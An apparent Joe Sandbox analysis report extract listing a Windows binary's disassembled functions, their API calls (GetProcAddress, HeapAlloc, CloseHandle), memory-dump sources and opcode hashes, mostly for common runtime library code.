                                                                                                                                                                                                                                          Function 00007FF71250AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABC6
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF71250A9D5,?,?,00000000,00007FF71250AA8A), ref: 00007FF71250ABD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                          • Instruction ID: a8802aae51cac424f400f2d529e3d3349466e64df339524e8b9acd597a08d3cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C021D710B18E8201FE517F5598D437D96829F847B0F8843B4DB1E477C5EEECA449C324
                                                                                                                                                                                                                                          Function 00007FF71250BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                          • Instruction ID: 807d283c6d46c8578195bd9ad7c5dd053b7dc14f7b4dbc7905097ca23d2b7aca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41D932918A4187EA34AF15A9C117DF3A0EF55760F900271DB8E437D1EFACE406CB64
                                                                                                                                                                                                                                          Function 00007FF7124F7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: 1a507de7276c9bbab92f886f3efbefe37545f589a9e6aecb4f13193d7354ece1
                                                                                                                                                                                                                                          • Instruction ID: dc2fab82c7131c1c93b3e53a6d7214cbf5fb84bef2b2eaf11938beafa19e844f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a507de7276c9bbab92f886f3efbefe37545f589a9e6aecb4f13193d7354ece1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621B421B18E614AFB10BB2668443BAD641BF85BE4FC94430EF0C0BB86DEBDE459C614
                                                                                                                                                                                                                                          Function 00007FF71250B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                          • Instruction ID: 2ae686ea682cbb24d85f2482c8eb0fa15b5478519b761845d40d3db79d611166
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2313E22E18E0285E6117F558CC137DAA90AB80BB4FC145B5EA5D473D2FEFCA449C739
                                                                                                                                                                                                                                          Function 00007FF712509961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                          • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                          • Instruction ID: 53758493f1c2ca3c1ce81ccd5a8c007ecf8af05ed849d31816adfff543db72f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8217E72E05F4589EB24AFA4C8802FC73B0EB44B28F844A76D75C06A99EFB8D548C754
                                                                                                                                                                                                                                          Function 00007FF712505F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 47145432ae132e9ac4b2a32f75bf4bfb0f4d69de619122aa562669d37b36c054
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7118731A1CA4141EA60BF11A88017DE664FF85BA8FC444B1FB8C57B96EFBCD404C768
                                                                                                                                                                                                                                          Function 00007FF712516354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                          • Instruction ID: 04c60779a7acf341c2b25f8d8cfde95d22987273b5447e8dc857f69cba0c99e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED218332718E418ADB61AF18D4C1379B6A0FB84BA4F944234E65D876D9DFBCD405CB20
                                                                                                                                                                                                                                          Function 00007FF7125003BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 453b067e982c6c7cc91ed70bd367d86f8aedca887b957ffd0331b3c204c0de48
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901A121A08F4580EA04FF529D811A9E691BF85FF0F8846B1EE5C23BD6EEBCD405C318
                                                                                                                                                                                                                                          Function 00007FF712507EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                          • Instruction ID: e3b21fa95c9733c9b9f3976d29a66e054a74783731f85c6a0b058afc359cbfb6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96011B21E1DE8240FA587E616EC1179D590AF447F0FD446F5EA1C826C6FEECA889C228
                                                                                                                                                                                                                                          Function 00007FF712508238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                          • Instruction ID: 04a2a502f0a7f9a7bd9ace702e883b64015b24f74403f4cd4d991b5faa7f9dd9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6E0EC50E1CE0787FA553EA44DC667995209F993A0FD045B4EA080A3C3FDACAC5DD639
                                                                                                                                                                                                                                          Function 00007FF71250EB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF71250B32A,?,?,?,00007FF712504F11,?,?,?,?,00007FF71250A48A), ref: 00007FF71250EBED
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                          • Instruction ID: a72b67cdc6398316ddc317ff2e0904bfd4fd3ac5673b302cbcb043bd0a246f3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F04F54B09A0241FE597F655CD12B4A2905F88BA0FD845B0C90F863C2FD9CE488D234
                                                                                                                                                                                                                                          Function 00007FF71250D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF712500C90,?,?,?,00007FF7125022FA,?,?,?,?,?,00007FF712503AE9), ref: 00007FF71250D63A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                          • Instruction ID: 0c188388f099706162224971c2fc7f0893b8cb9d8028ba0a028c3cc5c331252d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0FE11B1AA4645FE547FB15CD167992909F84BB0F8807B0DD2E852C2FEACA488C634

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00007FF7124F5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5840
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5852
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5889
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F589B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58B4
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58C6
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58DF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F58F1
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F590D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F591F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F593B
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F594D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5969
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F597B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F5997
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F59A9
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F59C5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF7124F64CF,?,00007FF7124F336E), ref: 00007FF7124F59D7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2767812014.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767766351.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767857996.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767897996.00007FF712532000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2767968080.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
